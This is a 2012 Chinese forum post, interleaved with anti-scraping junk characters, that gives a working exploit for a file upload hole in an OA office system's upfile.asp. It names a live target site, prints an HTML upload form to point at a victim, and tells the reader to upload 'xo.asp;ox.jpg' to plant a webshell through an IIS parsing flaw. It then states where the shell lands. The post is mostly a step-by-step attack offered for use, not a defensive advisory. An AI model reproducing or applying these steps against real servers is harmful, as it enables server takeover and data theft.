全能OA办公系统 上传漏洞 C$ J5 E, C4 J9 {' q9 F O# }1 r
7 X, ]6 \' w1 _8 @/ |/ C
系统介绍:
0 Z4 u2 j( Z- }* H$ N) V- U9 A7 \" N5 d
全能OA办公系统2012是功能非常强大的OA系统,目前功能已完全能满足日常办公需要。* J7 K* W2 B' \
: ] M. w& r" S! K主要功能:, V/ ?$ p; c6 C& _; o
公司通告 ' G9 p& a2 @+ q" ]6 c
工作计划
: H/ ]& b7 Q' ^4 P i通讯助理 7 ]: I7 ?6 U" y
客户资源
* }) T9 V+ t- U7 ~$ h+ J7 J我的公文
) O6 w& D# n' F+ A公文传阅
- `% V, t% R2 K9 }4 c Y公共资源
) I! j' |$ d$ j9 Q+ s3 ~ w资源预约 : v* B" Q" B2 l- v2 \* Z" M
今日考勤
; W m: z6 v6 _' m$ }个人计划
_5 O+ M7 y6 c2 ]7 L个人通讯录
" j4 G) n" @2 W" [# C个人基本档案 9 P; q! L7 a& H5 S( N( O0 p* a7 N) R
未读邮件 4 v8 X3 h6 l5 F1 ]6 ?, u' ~
发邮件 ! h/ F |2 e: S
收件夹
) H5 w: ~1 Q* r( w7 U寄件夹
+ ]. Z2 _( {6 k. ?" r/ G5 V; A网络硬盘 % y7 E( U& M7 a: Q- l: [7 X4 C
网络会议
/ Z* x; x4 D4 `5 _3 m$ H/ \- }9 F网络调查
: S" M5 d: J6 @4 A+ H交流论坛
' S$ p, `- h z- A
9 G; Y3 ]3 G+ q% h有兴趣测试的朋友可以下源码看看
Q: V5 J" i3 b4 E
; X- ?; \4 x) g# } ~% ?源码下载:
$ [2 W: p, k2 ~7 @( y, A6 H1 H2 v1 J% {% P6 c
http://www.mycodes.net/30/4750.htm
5 k& I4 w$ }( T- b
) H. T+ |5 \: d2 B漏洞介绍:
! }& U; ]. X/ g4 Z' K, S2 }, j }3 l; ?( \; C5 M, m' g/ t
由upfile.asp上传文件漏洞引起; l$ k- s3 J1 h8 Z, k. [ O
! }+ K7 d; w( }' N6 n测试方法:) i7 b' J7 |4 e) }) H
o5 J, m, u/ u# T5 u' k
使用名小子上传http://www.itlynn.com/upfile.asp即可6 K3 P( i. O( o
) f6 r1 L2 ?% ^1 f c
如果upfile.asp文件被删除不存在。
* p/ g- W/ n8 X" i' e
7 ^% c3 J9 s2 ^9 F 那么可以试着访问http://www.itlynn.com/upfile/upfile.asp 。
1 r# P/ t; s g1 H: f- P9 U
+ B) H# m+ I; q6 j如果存在那么将如下代码保存为upfile.html。
) }% _7 x( N1 C: ~: k" h2 \5 K; Q% _( u, g6 e
然后将action的参数修改为目标站点的url。例如 http://www.itlynn.com/upfile/upfile.asp。
! d, V( f. @/ N
3 y1 @/ m* v, }3 ^1 _* M# @9 B
% ?& M2 T' y4 b# N
& ?1 y( }5 W: u8 s5 @7 q& W( E01 <table border='0' align="center" cellpadding="5"> : ^( w `7 o* ~4 m9 S
" H; p& d1 w/ A( S02 <form method="POST"action="http://www.itlynn.com/upfile/upfile.asp"enctype="multipart/form-data"id="form1"name="form1"> 3 n8 t- v# R% n. ^
1 S" ^8 M6 Q* f# C$ N
03 <tr> ! W4 r! t7 v$ d4 W- ^# W
7 k0 c2 s8 j6 F( s; z; U" ]3 [
04 <td>报错:</td>
a8 N# P' ~# @0 g3 L& ?; S/ c' b9 X3 l
05 <td><input type='radio' name='errnumber' value='0'> + x N4 [' d4 `: {- H% n
, B9 n0 y7 Z) S2 t! [
06 自动更名
) }+ e4 Q7 i( i, W: |
' }: U; F1 H; w' N' H07 <input type='radio' name='errnumber' value='1' checked> 8 O, R! U$ B4 z! G/ T5 t' v
% h) h S% W2 S08 报错方式 + C6 z2 t; L9 }8 D2 i# g" U. U
& C3 V5 q P m( k q$ w09 <input type='radio' name='errnumber' value='2'>
2 u0 X3 b8 J( X; W$ |4 \" v! y e' [: k+ p
10 直接覆盖</td> * R2 l" U9 l& z: } Y( S
& M. e+ h* o# D8 f" `11 </tr> 6 T! T4 H+ i; T. E+ p+ U* \$ @% w
1 R& |: {% H9 x6 n
12 <tr>
" e( f+ _: L: d2 q
! N( a; O1 e8 }" e8 M13 <td>主题:</td> & w5 s2 g; X2 R; D) |$ k, S3 s) t
1 Y# J! @% Z! W" T3 b14 <td><input type='text' name='filename' size='30'></td> 8 ?- \! {" T3 V' S4 r: o/ L: P
6 }( L y7 W6 w6 M3 z15 </tr>
/ j+ O# ]% V0 N! M- v) [4 t0 t F& y: B; [% k4 Z
16 <tr> 1 h9 Y# ]. S) f
0 A5 s2 F. ]# P; @' R& H
17 <td>文件:</td> 8 E3 K# J, u- e7 g
4 |3 [. b! m: P) \ R9 a" T. `18 <td><input type="file"name="fruit"size="30"></td> 5 L+ M1 q9 b7 i) ]$ @. d7 x
, t0 b' P/ o$ p. T+ H8 }& H8 D19 </tr> 4 t& g. T$ V @- M& M% X N
% k/ }% k. s" Q+ p; W+ S5 {1 N
20 <tr>
|5 \) E" z9 |! Z
, E5 O( E* v/ l: K21 <td valign='top'>简介:</td>
6 v3 K( Y; D- Y, F/ J/ R* Y1 g, {. Z+ H" `- O
22 <td><textarea name='fileExt' cols='40' rows='5'></textarea></td>
. `2 [; \3 ~: y. u) N: i: x9 S8 \, N2 t; Z
23 </tr>
1 ], j- v- R/ h# S# _+ }+ P
1 b( [2 e' [0 \8 a' g24 + n: N; Y) U- R1 X) u- Z, } K
. X7 [$ r/ m |9 D25 <td colspan='2'><input type="submit" value="上传文件" name="subbutt"></td>
; C; i2 F( Y. ~' `1 V
0 O" K2 ?0 D: S' U% E+ `- @' z6 e26 </tr>
- r9 D- S8 d4 R Q+ ^
$ ?- f* T. r% [5 q0 E27 </form> 5 \: x/ |" m, P% p
0 ^) N$ r: G8 E0 i. a" i& U0 j
然后打开上传一个文件名为xo.asp;ox.jpg的文件。
- Q T h: k6 L: z! b$ y9 {
" }! K$ |+ w- v
; \" z8 v! b" N7 p- ~! {* ?, c
上传成功后,马的路径是:http://www.itlynn.com/upfile/savepath/xo.asp;ox.jpg
5 v( I7 Q/ t$ g3 i& s. p
) j5 U/ N, R3 C; [% g此漏洞需要配合解析漏洞利用。
: R5 W* q; z! t1 z! x+ |/ A: _" ^" Z- _8 ~. v$ Q3 H
|
发表于 2012-11-21 13:45:12
收藏
支持
反对